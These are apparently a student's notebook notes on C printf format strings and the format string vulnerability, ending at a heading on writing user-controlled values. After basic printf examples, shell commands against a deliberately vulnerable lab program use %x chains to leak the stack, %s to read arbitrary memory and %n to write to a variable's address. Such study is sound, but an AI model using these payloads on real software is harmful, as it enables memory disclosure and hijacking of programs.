# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can be used to print fixed strings, variables in many different formats
- the following program uses `printf()` incorrectly!
- "Hello World\n" string technically is the format string (devoid of special escape sequences called format parameters)
- format parameters begins with a `%` sign; for each format parameter (%) function expects arguments
- format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- following parameter requires values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [1]:
#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

Hello World!


In [2]:
// fmt_strings.c

#include <stdio.h>
#include <string.h>

int main() {
   char string[10];
   int A = -73;
   unsigned int B = 31337;

   strcpy(string, "sample");

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s  Address %p\n", string, string);

   // Example of unary address operator (dereferencing) and a %x format string
   printf("variable A is at address: %p\n", &A);
}

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample  Address 0xbfd420d2
variable A is at address: 0xbfd420c8


## The Format String Vulnerability
- using `printf(string)` instead of `printf("%s", string)`
- compile and run fmt_vuln.c from booksrc folder
```bash
$ .compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln testing
$ ./fmt_vuln testing%x
$ ./fmt_vuln $(perl -e 'print "%08x."x40')
```
- print four repeating bytes in reverse order (little-endian architecture)
- $ printf "\x25\x30\x38\x78\x2e\n"
    - these are the arguments for format string stored in higher memory addresses

## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
```bash
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%08x
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s # get segfault
```
- if a valid memory address is used, this process could be used to read a string found at that memory address
```bash
$ env | grep $PATH
```
- compile and run booksrc/getenvaddr.c
```bash
$ ./compile.sh getenvaddr.c getenvaddr
$ ./getenvaddr PATH ./fmt_vuln.exe
```
- use the path address to provide the value for %s
```bash
$ ./fmt_vuln.exe $(print "\x address in reverse bytes")%08x.%08x.%08x.%s
```

## Writing to Arbitrary Memory Addresses
- `%n` format parameter can be used to write to arbitrary memory address
- `test_val` variable has been printing its address and value in the debug statement
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%08x.%08x.%08x.%n
```
- the resulting value in the test variable depends on the number of bytes written before the `%n`
- this can be controlled to a a greater degree by manipulating the field width option
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%100x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%400x%n
```

## Writing User-Controlled Values (0xaddress)